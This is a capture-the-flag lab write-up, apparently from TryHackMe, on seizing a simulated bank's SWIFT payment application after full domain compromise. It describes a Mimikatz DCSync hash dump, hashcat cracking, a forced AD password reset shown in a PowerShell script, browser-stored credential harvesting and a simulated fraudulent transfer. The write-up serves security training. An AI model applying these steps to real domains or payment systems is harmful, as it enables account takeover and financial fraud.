Compromise of SWIFT and Payment Transfer
Last updated
Now that we have full control of the domain as both Enterprise and Domain Admin, our next objective is to compromise the SWIFT system and execute a payment transfer.
Earlier in the challenge, we identified the Swift Bank application, which should be accessible at http://swift.bank.thereserve.loc.
As the rootdc user on the bankdc machine, we enumerate all the groups present in the domain to understand the organizational structure and permissions. This helps identify the key roles and privileges within the bankdc domain.
Two groups stand out: Payment Approvers and Payment Capturers.
Since it's likely we'll need access to the workstations of these users, we dump the domain's NTLM hashes with Mimikatz using the lsadump::dcsync command (possible because we hold Domain Admin rights on bankdc) and attempt to crack them.
We successfully crack the NTLM hash of the c.young user with hashcat, while the other hashes could not be cracked with rockyou.txt or our pre-generated wordlist.
Next, using the network path, we locate the user profile of c.young on the WORK2 machine.
While checking the folder's contents, we find a note for the capturer.
In a similar manner, we come across a note for a.holt, who is an approver, on the JMP machine.
This note suggests that the SWIFT bank web application credentials for a.holt are separate from their Active Directory credentials, indicating that the relevant credentials might be stored on the JMP machine.
Since we do not know this user's Active Directory password (hashcat was unable to crack the hash), we can simply reset it through the Active Directory Users and Computers snap-in using the Reset Password option. Note that a forced reset is destructive and noisy: it changes the user's password, is logged on the domain controller, and will lock a.holt out of any service that still uses the old one, so record the original hash first if the environment must be left as found.
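The same two steps, enumerating the payment groups and resetting the uncrackable account's password, can be done from a PowerShell session on bankdc with the ActiveDirectory module instead of the GUI. This is an added example, not code from the original writeup: it assumes RSAT's ActiveDirectory module is available, that the session runs as Domain Admin, and the new password is a placeholder. The group names and the a.holt account come from the writeup; the domain NetBIOS name is read from the domain rather than guessed.

```powershell
# Added example: enumerate the SWIFT groups and reset an approver's AD password.
# Assumes the ActiveDirectory module (RSAT) and Domain Admin rights on bankdc.
Import-Module ActiveDirectory

$groups = @('Payment Approvers', 'Payment Capturers')   # names from the writeup
$members = foreach ($g in $groups) {
    # -Recursive resolves nested groups so no approver/capturer is missed
    Get-ADGroupMember -Identity $g -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        Get-ADUser -Properties Enabled, PasswordLastSet, LastLogonDate |
        Select-Object @{ n = 'Group'; e = { $g } }, SamAccountName, Enabled, PasswordLastSet, LastLogonDate
}
$members | Format-Table -AutoSize

# Record the target's state before touching it: the reset is destructive and
# is logged on the DC (event 4724), so know exactly what you changed.
$target = Get-ADUser -Identity 'a.holt' -Properties PasswordLastSet, PasswordNeverExpires
"Before reset: {0} PasswordLastSet={1}" -f $target.SamAccountName, $target.PasswordLastSet

# Equivalent of ADUC > Reset Password: -Reset sets a new password without the old one.
$newPass = ConvertTo-SecureString 'Str0ngExamplePass!2024' -AsPlainText -Force   # placeholder value
Set-ADAccountPassword -Identity 'a.holt' -Reset -NewPassword $newPass
# Do not force a change at next logon; that would break the interactive logon to JMP.
Set-ADUser -Identity 'a.holt' -ChangePasswordAtLogon $false -Enabled $true

$after = Get-ADUser -Identity 'a.holt' -Properties PasswordLastSet
"After reset:  {0} PasswordLastSet={1}" -f $after.SamAccountName, $after.PasswordLastSet

# Sanity check: prove the new credential authenticates before pivoting to JMP.
$netbios = (Get-ADDomain).NetBIOSName
$cred = New-Object System.Management.Automation.PSCredential("$netbios\a.holt", $newPass)
Get-ADUser -Identity 'a.holt' -Credential $cred | Out-Null
"Logon as $netbios\a.holt with the new password succeeded"
```

If the engagement requires leaving the account as it was, keep the NT hash from the DCSync dump; Mimikatz's lsadump::setntlm can write that hash back once you are done, which restores the user's original password without ever knowing its plaintext.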
After resetting the password, we can then log into the JMP machine as the user a.holt using the newly assigned password.
Opening the web application in the browser on JMP, we observe that the SWIFT credentials for a.holt have been saved in the browser's password store.
We are now able to access the Dashboard as an Approver.
What we know so far:
Credentials for Capturer: C.Young
Credentials for Approver: A.Holt
We are now in a position to leverage these credentials to further advance through the challenge. By following the specific steps outlined within the e-citizen platform, we can systematically complete the necessary tasks and capture the remaining flags.
We can login to the web application as Capturer and Approver on the same machine.
Flag 17 requires us to make a transaction between two dummy accounts.
Flag 18 requires us to capture a dummy transaction as the Capturer, C.Young.
Flag 19 requires us to approve the dummy transaction captured by the Capturer as the Approver, A.Holt.
Flag 20 requires us to repeat the steps for Flags 18 and 19 to complete the fraudulent transaction between the two dummy accounts that was initiated for Flag 17.
NOTE: We are now able to obtain the following flags by following the instructions on the e-citizen platform:
Flag 17: Access to SWIFT Application
Flag 18: Access to SWIFT application as capturer
Flag 19: Access to SWIFT application as approver
Flag 20: Simulated fraudulent transfer made
As a result, we have achieved full network compromise, having executed each goal and demonstrated the significant impact of this compromise.
By leveraging the acquired credentials, exploiting various vulnerabilities, and methodically traversing the network, we have shown how an attacker can gain control over critical systems, including both the child and parent domains, as well as specialized applications such as SWIFT.
This thorough approach highlights the potential risks to an organization's infrastructure and the wide-reaching consequences of a successful cyber attack.
This has undoubtedly been one of the most rewarding and challenging labs I've completed on TryHackMe.
The experience has been incredibly educational, as it introduced me to several attack vectors that I had never previously had the opportunity to explore. Through this challenge, I’ve gained invaluable hands-on experience that has significantly expanded my knowledge and skills in the field of cybersecurity.
This network challenge also highlighted the dynamic nature of live environments, where the behavior of systems can change unexpectedly when multiple users are interacting with them.
At times, methods that initially worked would suddenly stop functioning, forcing us to quickly adapt and find alternative solutions. This added an extra layer of complexity to the challenge, simulating real-world conditions where we need to remain flexible and resourceful in response to unforeseen issues. It was a valuable lesson in troubleshooting and resilience.